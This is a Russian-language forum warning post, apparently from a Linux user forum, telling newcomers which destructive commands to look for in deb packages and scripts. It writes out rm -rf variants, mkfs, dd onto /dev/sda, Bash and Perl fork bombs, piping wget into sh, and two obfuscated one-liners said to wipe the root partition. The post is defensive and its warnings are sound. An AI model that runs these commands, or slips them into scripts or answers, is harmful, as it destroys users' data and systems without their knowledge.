Настоятельно рекомендуем Вам, во избежание неприятных последствий, проверять путем открытия в gedit бинарных файлов, содержащихся в deb, так и самостоятельных, на отсутствие команд, содержащих:
Удаление. Удаляет все файлы, текущую директорию и все видимые файлы в текущей директории. По моему, достаточно ясно, почему эти команды опасны для запуска.
рм -рф в любых вариациях
rm -r .[^.]*
К сожалению, примеры вновь стали проявлятся. 27.05.2011 на сайте gnome-look.org был обнаружен deb-файл, устанавливающий, якобы, тему для рабочего стола. В директории Debian, как оказалось, содержался скрипт с вышеуказанной командой. Контент, конечно, удален, но полностью избежать подобных эксцессов не удастся. Будьте бдительны.
Переформатирование: Данные на устройстве указанном после команды mkfs будут уничтожены и заменены на чистую файловую систему.
mkfs
mkfs.ext3
mkfs.anything
Манипуляции с блочным устройством: "Сырые" данные будут записаны на блочное устройство. В большинстве случаев, это приведёт к полному затиранию файловой системы и потере всей информации:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Запускает огромное количество процессов, до тех пор пока система не зависнет, принуждая вас сделать жёсткую перезагрузку, которая может привести к утрате, повреждению данных или другим ужасным последствиям. В Bourne-подобных оболочках, например такой как Bash: (Это выглядит действительно любопытно и провоцирующе)
:(){ :|:& };:
НаPerl:
fork while fork
Tar-бомбу: Кто-то просит вас распаковать tar архив в существующую директорию. Такой архив может содержать миллионы файлов или проникать в систему угадывая имена файлов. Вы должны взять за правило, распаковывать архивы только во вновь созданные директории.
Распаковывающуюся бомбу: Кто-то просит вас распаковать архив, который на первый взгляд выглядит легким для закачки. На самом деле это данные запакованные с высокой степенью сжатия и при распаковке они будут заполнять ваш жёсткий диск, раздуваясь на сотни гигабайт. Не берите данные с непроверенных источников
Скрипт командной оболочки: Кто-то даёт вам ссылку на скрипт командной оболочки для запуска. Он может содержать любые команды как неопасные, так и зловредные. Не запускайте код, полученный от людей, которым вы не доверяете.
wget http://какое-то_место/какой-то_файл
sh ./какой-то_файл
wget http://какое-то_место/какой-то_файл -O- | sh
Код компиляции: Кто-то даёт вам исходные коды и затем просит вам их откомпилировать. Очень просто спрятать вредоносный код где-нибудь внутри большого куска исходного кода и исходный код даёт атакующему гораздо больше возможностей для маскировки вредоносной информации. Не компилируйте и не запускайте откомпилированный код, если это не код хорошо известного приложения, полученный с доверенного сайта (например SourceForge или домашняя страница автора или сайт Debian.org)
Для начинающих пользователей это выглядит как "непонятный набор hex кодов", который так типичен для пробных версий. Как бы то ни было, на самом деле запускается команда рм -рф ~ / &, которая уничтожает вашу домашнюю директорию, если вы под обычным пользователем и все файлы, если вы под суперпользователем. Если вы можете различить команду в этом коде, значит вам не нужно читать эту тему. В противном случае, помните, что такие вещи могут встречаться в любых подобных кодах - будьте осторожны.
Ещё несколько опасных примеров.
Программа из одной строчки на Perl:
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Удаляет все каталоги в корневой директории!
Запускать под bash'ем из-под рута:
ISF=$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -');$ISF 2>/dev/null
Команда молча потрёт всю корневую партицию!
Лучшим решением будет установка из проверенных источников, так вы будете максимально обезопасены от неприятных последствий.
P.S. Убедительная просьба не испытывать команды "на прочность". Часть команд может и не работать, но все же...
И последнее. Помним, что применение подобных команд в отношении пользователей является, в соответствии в Уголовным Кодексом РФ, уголовно-наказуемым деянием (ст.ст. 273, 274 УК РФ), а на форуме карается полным лишением доступа